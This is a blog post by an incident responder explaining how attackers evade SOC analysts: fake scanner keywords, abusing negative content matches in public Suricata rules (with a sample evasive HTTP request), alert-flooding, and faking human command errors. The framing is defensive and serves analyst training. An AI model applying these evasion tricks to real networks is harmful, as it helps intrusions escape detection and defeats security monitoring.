There are various different methods and techniques to evade detection by an IDS. If you know how a SIEM in a network works you can also adapt your attack to prevent the target from detecting your move. But this post is a first of a series in which I want to share my (only) 3 years of observation and experience as an Incident Responder about how to avoid being detected by a Security Analyst/ Incident Responder, not by the security system itself. Most of the time tricking the investigator is way easier than hiding from a security system. While most of these analyst generated false detections could be prevented by better rules, more quality trainings and continues feedbacks it is still a relevant problem.
IDS Evasion
First of all, here are some well-known IDS evasion techniques. In this post I’m not going to go into details I’m only pointing out that tricking an IDS is not a trivial thing to do. It is easy to see that one has to have a deep technical knowledge to find a method which can be used to prevent from being detected or even to use one of the known techniques.
- Encoding / Obfuscation / Encryption: These are three different methods but all of them are used to change the original packet/content so the IDS can not understand and evaluate the packet or file. This means the target system should be able to translate the package so either the attacker already has to be present in the target environment or he have to use an Encoding / Obfuscation / Encryption method which is overseen by the owner of the system.
- Denial of Service attack: Every IDS system works differently when it is overloaded. In some cases, the IDS will just forward a packet if it does not have enough resource to examine it.
- Polymorphism: If the pattern-matching is strict a little change in your file/packet can successfully evade the detection.
- Fragmentation: This is a method which is used to split the packet in a way that every fragment would be recognized by the IDS as clean. Lot of IDS systems won’t/can’t reconstruct the original message, therefore, won’t be able to check the malicious payload. The fragments are going to be put together on the destination system where it can make its job undetected (by the network IDS).
- Overlapping packets: Sending overlapping TCP packets. The trick is that the IDS will reconstruct the packet in a different way than the target, so for the IDS it will look like the packet is not malicious while the target will get the malicious entity successfully.
This was just a short list but one can see that these are really technical methods. Some of them only require basic knowledge while for others the attacker should know how networks work, how in general an IDS behaves, what is the used IDS or should have even more internal knowledge about the targeted end-system/company. On the other hand, tricking the analyst who is going to evaluate a generated alert can be done with less knowledge in many cases.
Evade the analyst
In this first post I want to focus on trivial stuffs and put the more advanced or interesting observations into a latter part of the series.
1. Keywords for scanning
Internal scanning activities and hardening scenarios aren’t unusual at big companies. Sometimes these scans are done by an internal team in other times it is done by external companies. These scans can generate a lot of traffic in the network and since they contain exploits, malicious contents alerts will be generated as well. These are not true positive alerts and they should be prevented from appearing on the console for the analysts.
What can a company do to eliminate these? If a well-maintained network hierarchy documentation is provided it can be used to filter out the IP addresses which are going to be scanned or the known scanner IPs. Unfortunately, the number of IT devices are growing fast and a great deal of the companies can’t keep up with the changes. Therefore several network hierarchy documentations are insufficient or don’t even exist. Even if there is a proper documentation sometimes the security team doesn’t know where the alerts going to be raised in the network. The network can be huge and tricky and a packet during its travel in the network will be able to change its IPs due to the usage of loadbalancers, concentrators or due to NATing. Sometimes not the original request itself but the response is going to be caught by the IDS so even with a known scanner and target IPs the packet can contain information which is not predictable or at least not trivial. For these reasons some companies use keywords in the packets which can be filtered by the IDS, by the SIEM or in a worst-case scenario by the analysts and it is easy to use in case of internal and external scanning as well.
Let’s say that the company uses an imaginary scanner named RandomScanner for internal scanning and they are putting the string ‘RandomScanner’ into every packet to indicate it is a scanning activity not a real attack. In some network, every scan attempt which contains this string will be suppressed and no alert will be generated. In other cases, the handling of the scan is not automatic and it is done by the analysts. The employee has to be really well-trained to be able to determine whether the given script appeared in the packet to indicate a scan, it was done by an attacker or if it is just a coincidence. Putting the string into the packet by a malicious third party is not that complicated but it is an even bigger issue when the request or response accidentally contains the given words which make the analyst believe it was just a scan.
Here is an exmaple for the latter one which could have been eliminated by proper training or correct company culture:
An exploit targeted a website which had the debugger/developer mode turned on. After the exploit was executed the website showed an error message. It was just a coincidence that one of the used modules on the website had the same name as the vulnerability scanner we used internally. Thus after the exploit attempt the site responded with something like this: “Loading the module RandomScanner failed.” along with some other pieces of information. When the analyst checked the response packet he saw this module name which looked like the name of our tool so he happily closed the alert as an internal scanning activity. While the exploit was unsuccessful this is still a miscategorization.
To absolve this you will need to know a keyword that is used in the network so it will require some internal knowledge. On the other hand, you can put any message into the packet for the analysts like “Company ordered scanning activity “and if you have luck they will think it is a valid message. An attacker doesn’t have to evade an IDS. The system will alert, an alert will be raised. However, the typically overloaded analysts going to close these alerts and move forward. So as an attacker you don’t even have to deal with the technical stuff you can focus on the social weakness of the network.
2. Abusing rule (mis)configuration
Let’s start the explanation with an example which can help us to understand how someone could make mistakes during rule creation. This rule is created by Emerging Threat which is available for free to everybody: https://doc.emergingthreats.net/bin/view/Main/2013138
Here is the Suricata rule itself copied from the link above:
alert http $HOME_NET any -> $EXTERNAL_NET any (msg:"ET MOBILE_MALWARE XML Style POST Of IMEI International Mobile Equipment Identity"; flow:established,to_server; content:"POST"; http_method; nocase; content:""; http_client_body; nocase; content:"<|2F|IMEI>"; fast_pattern; nocase; http_client_body; distance:0; content:!".blackberry.com"; http_host; content:!".nokia.com"; http_host; content:!".sonyericsson.com"; http_host; reference:url,www.met.police.uk/mobilephone/imei.htm; classtype:trojan-activity; sid:2013138; rev:9; metadata:created_at 2011_06_30, updated_at 2011_06_30;)
Let’s focus on one of the negative content matches in the rule:
content:!".blackberry.com"; http_host;
content:!".nokia.com"; http_host;
content:!".sonyericsson.com"; http_host;
This part of the rule means no alert will be opened if the host in the packet contains ‘.blackberry.com’ or ‘.nokia.com’ or ‘.sonyericsson.com’. It works correctly this way, but what happens if someone writes a rule and instead of the ‘http_host’ buffer he uses the ‘http_header’ buffer? In this unfortunate situation, every packet will evade the detection which contains this string in its header, for example in the user-agent field. And all of us know that the attacker can change its outgoing packets however he wants to.
The rule above wasn’t generated for a specific exploit but anybody can imagine similar mistakes/evasion can be made in other rules as well. Here is an example for this also by Emerging Threat (https://docs.emergingthreats.net/bin/view/Main/2024931). I only copied a small portion of the rule:
flow:to_server,established; content:"User-Agent|3a 20 0d 0a|"; http_header;
content:!".mcafee.com"; http_header;
In case of the (partial) rule above a traffic like one below won’t be recognized as an attack and will be allowed into the network without raising an alert:
GET /exploit=yes HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE5.01; Windows NT .mcafee.com)
Host: www.vulnerabletestsite.net
Accept-Language: en-us
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
This could be a problem especially in case unqualified internal parties can tune the rules without supervision. If an analyst can fine-tune a rule without knowing how to do it properly they can give a tool into the hands of the attacker. Also, analysts tend to overlook small information like buffers and think that the rule generated a false-alert by mistake.
So if you, an attacker, know that a string would appear in a negative content match part of the triggering rule you can just put that string into your packet. Even if the rule triggers there is a chance the analyst will think it’s a false-alert, either because incorrect buffer was used in the rule or because the analyst won’t have the proper knowledge to understand the rule itself.
Also, be aware that ET rules are public but lots of companies use their rules. This means the rules which are otherwise kept hidden by the company can be known by an external party as well without any effort.
3.DoS the analyst
The list from above mentions DoS as an IDS evasion technique. DoSing a system based on a volumetric attack is not that easy because you have to overload a system which is designed to generally handle a huge amount of traffic. On the other hand, the analysts and incident responders are not prepared to handle the same amount of alerts. An attacker simply has to choose one or more rules he wants to trigger and generate a lot of traffic which is harmless but still triggers the rule. This way the analyst is going to be busy with solving them one by one and won’t be able to handle all of them properly and with enough care.
Using the already mentioned ET rule (https://docs.emergingthreats.net/bin/view/Main/2024931) as an example every packet which contains this user-agent: |3a 20 0d 0a| (in hexa) and does not contain the hosts in the negative content matches will generate an alert. One can simply use a webspider to collect valid URLs, subdomains and pages. After that GET requests could be sent towards these sites to generate a great amount of alerts. An attacker can easily hide an exploit or any attack into one of his packets and due to the high volume of generated alerts, it will be hard to distinguish the bogus traffic and alerts from the real ones. An analyst will be able to find the real attacks in a timely manner only if other rules are also going to fire on those exploits.
The attacker can use other tricks as well like changing its source IP and targets and choosing multiple rules to trigger not just one. This way he can prevent a tool or script creation by the blue team which would be made for quicker analysis. If there are too many variables it will be harder to automate the evaluation.
This whole method can work because of the fact that people tend to lose concentration if they have to do the same boring task over and over again without real results. A huge amount of benign traffic can trigger this effect in the analyst, who, as a result, will miss the real, malicious alert as well. Some of the first alerts will be investigated properly but after some time the people tend to put less and less effort into similar, generally FP alerts.
4.Recognized human behavior
There are plenty of cases when it is hard to decide whether an executed programme is malicious or benign based on the provided information. If the programme executes different commands in cmd, powershell or bash sometimes it can be easily distinguished from a real person’s behavior.
A good example is that a malware generally tries to stay low and generate as few noises as possible so it won’t use any non-necessary commands. Whereas a normal person uses the help switch, the man page of a tool and makes mistakes. These differences can help the evaluation of an alert but it can be used by the malware as well to fake and hide its identity.
Even when the information is insufficient the analyst still has to decide whether there is a real infection on the machine or it is just a user’s activity. If the above-mentioned behaviors occur, the analysts tend to believe it is just a normal user action due to their bias. This way they can be tricked to make the wrong decision.
Real life example:
During one of my investigations I realized that the alert I’m dealing with was closed multiple times in the past. They were closed as false-positive detection due to a small portion of the executed commands. The two commands which made the analysts believe this is a FP were an ipconfig first and then an ifconfig execution.
Due to their bias, people closed these alerts because after they saw the two commands they thought somebody accidentally executed the wrong one and they believed a virus wouldn’t make a mistake like this. Malwares tend to minimize their footprint to help them stay in the shadows. This assumption is not necessarily correct. This activity could have been a tricky malware (or an attacker on the machine too, but that is a different situation).
What was initially missed is the fact that this activity, this same command mistake was made in the same context but on different machines in the past too which means it wasn’t a specific user who just made a mistake. After I found this information it rather looked like some automation tool or even a real infection, but definitely not a one-time manually made mistake.
During the final investigation we found out that an administrator used the two commands to make his script able to work on Windows and Linux environment as well. Instead of checking the correct OSs he rather used some error-handling. This way the non-existing command was caught by the error-handler while the existing one could be executed successfully. A script which was designed to be a small test script was copied and re-used in the production environment later on which caused our alerts. On the other hand this could have been a poorly written malware as well which would have been closed as FP.
Note:
I changed the real-life scenarios enough to hide any internal information of any of my recent or previous employers. In this post I talked about IDSs systems and not IPSs, so in this case evading the security system wasn’t necessary. It has been my observation lately that security analysts are heavily overloaded, really inexperienced and untrained and sometimes the whole security operation centers are understaffed. In my experience especially tier 1 analysts lack time for a real investigation for every alert and they quickly have to decide whether they want to deep-dive into the detection or close it fast and move forward.